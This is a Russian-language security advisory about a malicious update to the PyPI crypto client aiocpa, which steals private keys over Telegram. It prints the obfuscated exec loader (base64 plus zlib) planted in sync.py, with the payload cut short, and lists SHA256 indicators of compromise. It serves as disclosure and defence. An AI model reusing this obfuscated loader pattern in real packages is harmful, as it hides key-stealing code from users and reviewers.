Автоматическая система обнаружения рисков Phylum заметила, что пакет aiocpa на PyPI был обновлен и содержит вредоносный код, который украдет приватные ключи, утечка которых происходит через Telegram при инициализации криптобиблиотеки. Злоумышленники опубликовали это обновление на PyPI, но специально очистили репозиторий пакета на GitHub, чтобы избежать обнаружения. Пакет aiocpa является клиентом Crypto Pay API и имеет синхронные и асинхронные возможности.
Описание
Первая версия пакета была опубликована в августе 2024 года, и с тех пор он получал обновления. Однако последнее обновление версии 0.1.13 содержало изменения в файле cryptopay/utils/sync.py. В этом файле был добавлен следующий код:
| 1 | _ = lambda __ : __import__('zlib').decompress(__import__('base64'). b64decode(__[:: -1])); exec((_)(b'==gdC2K...')) |
Данный код выполняет импорт модулей zlib и base64, а затем дешифрует и выполняет скрытый код. Таким образом, вредоносное обновление в aiocpa позволяет злоумышленникам получать приватные ключи путем их утечки через Telegram.
Однако стоит отметить, что злоумышленники аккуратно удалили вредоносный код из репозитория пакета на GitHub. Такое удаление кода после его публикации на PyPI помогло им избежать обнаружения.
У пользователей следует быть осторожными при использовании версии 0.1.13 пакета aiocpa и рекомендуется не обновляться до этой версии, пока проблема с вредоносным кодом не будет решена. Разработчики пакета должны проверить свою систему на наличие вредоносного кода и принять соответствующие меры для защиты пользователей.
Indicators of Compromise
SHA256
- 556bfea997880f1365d3822d26ea57e2cfaecb231128ea1e7e50ad1f778147bb
- 6f435a3f209c09d8f7cf180f759a5faa2ff215edc1afce2cd62078574bb70c69
- ad9f5183aa8d792ed1bc991ab3ac9b0cd4160fd9276071a7e63e7d7b4e3481b8
- c43148103e24a16d59896d6db395ed66a2cd5772ff308dfea10aa36b7f433589
